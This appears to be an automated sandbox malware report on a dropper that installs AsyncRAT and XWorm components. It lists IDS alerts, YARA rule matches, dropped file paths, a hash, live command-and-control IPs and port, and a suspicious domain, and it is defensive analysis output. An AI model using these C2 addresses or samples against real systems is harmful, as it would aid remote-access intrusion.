                        Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49991 -> 45.141.27.248:7777
                        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.6:49991
                        Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49991 -> 45.141.27.248:7777
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: 45.141.27.222
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m)IZ_
                        Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                        Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000015.00000002.3481943443.000001F4E2A33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp, Ratty_win32_directx11.exe.5.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://discord.gg/sGNBaJSzYD
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://discord.gg/sGNBaJSzYDstart
                        Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                        Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://qualityboy.rdcw.xyz/
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://qualityboy.rdcw.xyz/Rat
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\All function.exeCode function: 5_2_00007FFD34780A215_2_00007FFD34780A21
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34769EF38_2_00007FFD34769EF3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3476947D8_2_00007FFD3476947D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34768E058_2_00007FFD34768E05
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD347635728_2_00007FFD34763572
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34765EFA8_2_00007FFD34765EFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD347627158_2_00007FFD34762715
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3476AB158_2_00007FFD3476AB15
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34765BFA8_2_00007FFD34765BFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3476B8088_2_00007FFD3476B808
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347A5CFA10_2_00007FFD347A5CFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347A34FA10_2_00007FFD347A34FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347A608110_2_00007FFD347A6081
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347A89B510_2_00007FFD347A89B5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347A26A310_2_00007FFD347A26A3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34798E0512_2_00007FFD34798E05
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34795EFA12_2_00007FFD34795EFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD347982C512_2_00007FFD347982C5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD347926D312_2_00007FFD347926D3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34790ED312_2_00007FFD34790ED3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34795BFA12_2_00007FFD34795BFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3479BBFB12_2_00007FFD3479BBFB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD347834FA16_2_00007FFD347834FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD34785CFA16_2_00007FFD34785CFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD347825ED16_2_00007FFD347825ED
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD347889F216_2_00007FFD347889F2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD34789E0116_2_00007FFD34789E01
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD3478B9BA16_2_00007FFD3478B9BA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD347836D216_2_00007FFD347836D2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD34785BFA16_2_00007FFD34785BFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34778EFA19_2_00007FFD34778EFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3477BA6A19_2_00007FFD3477BA6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3477ABF219_2_00007FFD3477ABF2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34775BFA19_2_00007FFD34775BFA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3477B82819_2_00007FFD3477B828
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34770B9A19_2_00007FFD34770B9A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A84E321_2_00007FFD347A84E3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A34B221_2_00007FFD347A34B2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A8DE521_2_00007FFD347A8DE5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A89F221_2_00007FFD347A89F2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A26F521_2_00007FFD347A26F5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD347A9FF321_2_00007FFD347A9FF3
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe A9BD5014B5A6744B0A5C180A3E76FF546A514DCBAD8BF2D8C500F903A285424B
                        Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe4 vs dLRcE11Dkl.exe
                        Source: dLRcE11Dkl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: dLRcE11Dkl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: All function.cmd.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, 4EPW2fKcngj.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4EPW2fKcngj.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4EPW2fKcngj.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.csCryptographic APIs: 'TransformFinalBlock'
